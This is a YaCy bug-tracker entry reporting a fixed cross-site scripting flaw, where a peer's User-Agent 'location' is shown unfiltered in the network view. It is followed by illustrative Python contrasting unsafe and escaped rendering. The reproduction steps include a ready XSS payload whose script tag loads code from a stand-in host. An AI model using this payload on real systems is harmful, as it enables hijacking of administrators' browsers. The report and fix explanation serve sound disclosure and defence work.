ID | Project | Category | View Status | Date Submitted | Last Update |
0000204 | YaCy | Wishlist - Wunschliste | public | 2012-08-03 23:08 | 2021-10-13 05:44 |
Reporter | soultcer | |
Assigned To | Lotus | |
Priority | normal | Severity | minor | Reproducibility | have not tried |
Status | resolved | Resolution | fixed | |
ETA | none | |
Platform | | OS | | OS Version | |
Product Version | YaCy 1.0 | |
Target Version | | Fixed in Version | YaCy 1.1 | |
Summary | 0000204: XSS attack YaCy peers using modified User-Agent string |
Description | YaCy extracts the "location" from the User-Agent string. This "location" is displayed without any filter in the network view. |
Steps To Reproduce | 1) Modify rogue YaCy instance to report its own User-Agent as 'yacybot (freeworld/global; <script type="text/javascript" src="http://badsite.example/xss.js"></script>)'
2) Contact target peer with rogue YaCy instance.
3) Trick administrator of target peer to visit his network view. |
Tags | No tags attached. |
Attached Files | |
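The following is an added illustration of the flaw the report describes, not code from the reporter or from YaCy itself. It assumes the User-Agent layout visible in the reporter's own payload, `yacybot (<network>; ...; <location>) <url>`, with the location being the last semicolon-separated field inside the parentheses; the two sample User-Agent strings are constructed for this example. It shows a peer-supplied location dropped straight into a network-view table cell, the same cell with the value HTML-escaped at output time, and an input-side plausibility check that would reject the payload before it is ever stored.

```python
import html
import re

# Constructed sample User-Agent strings (not captured from a real peer). The layout
# assumed here is taken from the report's example: yacybot (<network>; ...; <location>) <url>
BENIGN_UA = "yacybot (freeworld/global; amd64 Linux 3.2.0; java 1.7.0; Europe/de) http://yacy.net/bot.html"
MALICIOUS_UA = ('yacybot (freeworld/global; <script type="text/javascript" '
                'src="http://badsite.example/xss.js"></script>)')

# Greedy match: the payload may itself contain ')' so we take everything up to the last one.
_PAREN = re.compile(r"^yacybot \((.*)\)")

# Hypothetical allow-list for a location such as "Europe/de": letters, digits, '/', '_', '-', '.'
_LOCATION_OK = re.compile(r"^[A-Za-z0-9_./-]{1,64}$")


def extract_location(user_agent):
    """Return the last ';'-separated field inside the parentheses, or None if not a yacybot UA."""
    m = _PAREN.match(user_agent)
    if not m:
        return None
    fields = [f.strip() for f in m.group(1).split(";")]
    return fields[-1] or None


def is_plausible_location(location):
    """Input-side check: reject anything that does not look like a location token at all."""
    return location is not None and _LOCATION_OK.match(location) is not None


def render_peer_row_unsafe(user_agent):
    """The pattern the report describes: peer-controlled text interpolated into HTML unfiltered."""
    loc = extract_location(user_agent) or "unknown"
    return '<td class="location">%s</td>' % loc


def render_peer_row_safe(user_agent):
    """Hardened variant: the same cell, but untrusted text is HTML-escaped at the point of output."""
    loc = extract_location(user_agent) or "unknown"
    return '<td class="location">%s</td>' % html.escape(loc, quote=True)


def contains_active_markup(fragment):
    """Crude probe used only to show the difference between the two renderings."""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    for ua in (BENIGN_UA, MALICIOUS_UA):
        loc = extract_location(ua)
        print("location field:  ", repr(loc))
        print("plausible:       ", is_plausible_location(loc))
        print("unsafe rendering:", render_peer_row_unsafe(ua))
        print("safe rendering:  ", render_peer_row_safe(ua))
        print()
```

Output escaping is the fix that closes the hole regardless of where the value came from; the allow-list is defence in depth, since a location string has no legitimate reason to contain `<`, `"` or `;`. Either measure alone would have stopped the payload in the report, but only escaping protects against the next field that someone forgets to validate.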